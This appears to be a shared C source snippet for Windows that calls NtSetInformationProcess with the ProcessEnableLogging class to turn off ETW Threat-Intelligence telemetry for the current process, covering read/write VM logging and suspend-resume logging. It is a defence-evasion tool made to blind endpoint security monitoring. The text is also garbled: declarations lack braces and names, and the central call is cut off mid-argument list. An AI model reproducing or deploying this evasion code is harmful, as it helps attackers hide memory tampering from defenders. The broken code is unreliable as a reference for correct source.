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Created February 26, 2024 10:40
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#include <windows.h>
#include <stdio.h>
#pragma region [typedefs]
ProcessBasicInformation = 0x0,
ProcessQuotaLimits = 0x1,
ProcessIoCounters = 0x2,
ProcessVmCounters = 0x3,
ProcessTimes = 0x4,
ProcessBasePriority = 0x5,
ProcessRaisePriority = 0x6,
ProcessDebugPort = 0x7,
ProcessExceptionPort = 0x8,
ProcessAccessToken = 0x9,
ProcessLdtInformation = 0xa,
ProcessLdtSize = 0xb,
ProcessDefaultHardErrorMode = 0xc,
ProcessIoPortHandlers = 0xd,
ProcessPooledUsageAndLimits = 0xe,
ProcessWorkingSetWatch = 0xf,
ProcessUserModeIOPL = 0x10,
ProcessEnableAlignmentFaultFixup = 0x11,
ProcessPriorityClass = 0x12,
ProcessWx86Information = 0x13,
ProcessHandleCount = 0x14,
ProcessAffinityMask = 0x15,
ProcessPriorityBoost = 0x16,
ProcessDeviceMap = 0x17,
ProcessSessionInformation = 0x18,
ProcessForegroundInformation = 0x19,
ProcessWow64Information = 0x1a,
ProcessImageFileName = 0x1b,
ProcessLUIDDeviceMapsEnabled = 0x1c,
ProcessBreakOnTermination = 0x1d,
ProcessDebugObjectHandle = 0x1e,
ProcessDebugFlags = 0x1f,
ProcessHandleTracing = 0x20,
ProcessIoPriority = 0x21,
ProcessExecuteFlags = 0x22,
ProcessResourceManagement = 0x23,
ProcessCookie = 0x24,
ProcessImageInformation = 0x25,
ProcessCycleTime = 0x26,
ProcessPagePriority = 0x27,
ProcessInstrumentationCallback = 0x28,
ProcessThreadStackAllocation = 0x29,
ProcessWorkingSetWatchEx = 0x2a,
ProcessImageFileNameWin32 = 0x2b,
ProcessImageFileMapping = 0x2c,
ProcessAffinityUpdateMode = 0x2d,
ProcessMemoryAllocationMode = 0x2e,
ProcessGroupInformation = 0x2f,
ProcessTokenVirtualizationEnabled = 0x30,
ProcessConsoleHostProcess = 0x31,
ProcessWindowInformation = 0x32,
ProcessHandleInformation = 0x33,
ProcessMitigationPolicy = 0x34,
ProcessDynamicFunctionTableInformation = 0x35,
ProcessHandleCheckingMode = 0x36,
ProcessKeepAliveCount = 0x37,
ProcessRevokeFileHandles = 0x38,
ProcessWorkingSetControl = 0x39,
ProcessHandleTable = 0x3a,
ProcessCheckStackExtentsMode = 0x3b,
ProcessCommandLineInformation = 0x3c,
ProcessProtectionInformation = 0x3d,
ProcessMemoryExhaustion = 0x3e,
ProcessFaultInformation = 0x3f,
ProcessTelemetryIdInformation = 0x40,
ProcessCommitReleaseInformation = 0x41,
ProcessDefaultCpuSetsInformation = 0x42,
ProcessAllowedCpuSetsInformation = 0x43,
ProcessSubsystemProcess = 0x44,
ProcessJobMemoryInformation = 0x45,
ProcessInPrivate = 0x46,
ProcessRaiseUMExceptionOnInvalidHandleClose = 0x47,
ProcessIumChallengeResponse = 0x48,
ProcessChildProcessInformation = 0x49,
ProcessHighGraphicsPriorityInformation = 0x4a,
ProcessSubsystemInformation = 0x4b,
ProcessEnergyValues = 0x4c,
ProcessActivityThrottleState = 0x4d,
ProcessActivityThrottlePolicy = 0x4e,
ProcessWin32kSyscallFilterInformation = 0x4f,
ProcessDisableSystemAllowedCpuSets = 0x50,
ProcessWakeInformation = 0x51,
ProcessEnergyTrackingState = 0x52,
ProcessManageWritesToExecutableMemory = 0x53,
ProcessCaptureTrustletLiveDump = 0x54,
ProcessTelemetryCoverage = 0x55,
ProcessEnclaveInformation = 0x56,
ProcessEnableReadWriteVmLogging = 0x57,
ProcessUptimeInformation = 0x58,
ProcessImageSection = 0x59,
ProcessDebugAuthInformation = 0x5a,
ProcessSystemResourceManagement = 0x5b,
ProcessSequenceNumber = 0x5c,
ProcessLoaderDetour = 0x5d,
ProcessSecurityDomainInformation = 0x5e,
ProcessCombineSecurityDomainsInformation = 0x5f,
ProcessEnableLogging = 0x60,
ProcessLeapSecondInformation = 0x61,
ProcessFiberShadowStackAllocation = 0x62,
ProcessFreeFiberShadowStackAllocation = 0x63,
MaxProcessInfoClass = 0x64
ULONG Flags;
ULONG EnableReadVmLogging;
ULONG EnableWriteVmLogging;
ULONG EnableProcessSuspendResumeLogging;
ULONG EnableThreadSuspendResumeLogging;
//ULONG EnableLocalExecProtectVmLogging : 1; // New in Win11
//ULONG EnableRemoteExecProtectVmLogging : 1; // New in Win11
ULONG Reserved = 26;
UCHAR Flags;
UCHAR EnableReadVmLogging : 1;
UCHAR EnableWriteVmLogging : 1;
UCHAR Unused : 6;
typedef NTSTATUS(NTAPI* typeNtSetInformationProcess)(HANDLE ProcessHandle, ULONG ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength);
#pragma endregion
int main(int argc, char** argv, char** envp)
HMODULE Ntdll = GetModuleHandleA("ntdll.dll");
typeNtSetInformationProcess NtSetInformationProcess = (typeNtSetInformationProcess)GetProcAddress(Ntdll, "NtSetInformationProcess");
// Prepare for NtSetInformationProcess
PROCESS_LOGGING_INFORMATION ProcessLoggingInformation = { 0 };
ProcessLoggingInformation.Flags = (ULONG)0xf;
ProcessLoggingInformation.EnableReadVmLogging = 0;
ProcessLoggingInformation.EnableWriteVmLogging = 0;
ProcessLoggingInformation.EnableProcessSuspendResumeLogging = 0;
ProcessLoggingInformation.EnableThreadSuspendResumeLogging = 0;
ProcessLoggingInformation.Reserved = 26;
NTSTATUS Status = NtSetInformationProcess(
(HANDLE)-1, // -1 is pseudo-handle to current process
if (Status == 0)
printf("[+] Successfully disabled the following ETW-Ti events\n"
" - ReadVmLogging\n"
" - WriteVmLogging\n"
" - ProcessSuspendResumeLogging\n"
" - ThreadSuspendResumeLogging\n");
printf("[!] Error, status 0x%08X\n", Status);
return 0;
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